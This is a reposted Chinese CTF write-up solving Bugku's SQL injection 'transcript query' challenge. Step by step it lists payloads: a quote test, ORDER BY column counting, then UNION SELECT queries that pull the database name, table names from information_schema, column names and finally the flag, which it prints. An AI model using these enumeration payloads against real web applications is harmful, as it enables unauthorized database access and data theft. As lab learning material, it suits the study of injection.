sql注入(成绩单查询)——bugku

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

1.测试注入点,输入单引号:

'                                                    //发现无结果

img 2.继续测试注入点,输入1’:

1'                                                                            //发现无结果

img 3.测试注入点,输入1’ #

1' #                                              //发现回显数据!!!确定为字符型注入

img

4.猜解字段数,输入1’ order by 5#

1' order by 5#                                                                //并不是三个字段

img

5.猜解字段数,输入1’ order by 4#

1' order by 4#                                                                    //是4个字段

img 6.联合查询,测试字段显示的顺序以及那些会回显,输入-1’ union select 1,2,3,4

-1' union  select  1,2,3,4                                            //发现只有2,3,4位置回显,并且自作向右显示

img 7.联合查询,暴当前库名,输入-1’ union select 1,version(),user(),database()#

-1' union select 1,version(),user(),database()#                        //发现数据库名为skctf_flag

img

8.联合查询,暴当前库里的表名,输入-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#  //暴表名为fl4g

img 9.暴当的表里的字段名,输入-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g’#

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#   //列名为skctf_flag

img 10.爆出字段的内容,输入-1’ union select 1,2,3,skctf_flag from fl4g#

-1' union select 1,2,3,skctf_flag from fl4g#            //发现skctf_flag字段内容

img

BUGKU{Sql_INJECT0N_4813drd8hz4}

一句天赋毁了别人多少努力
                                                                                                           2019.11.10
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102998962
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复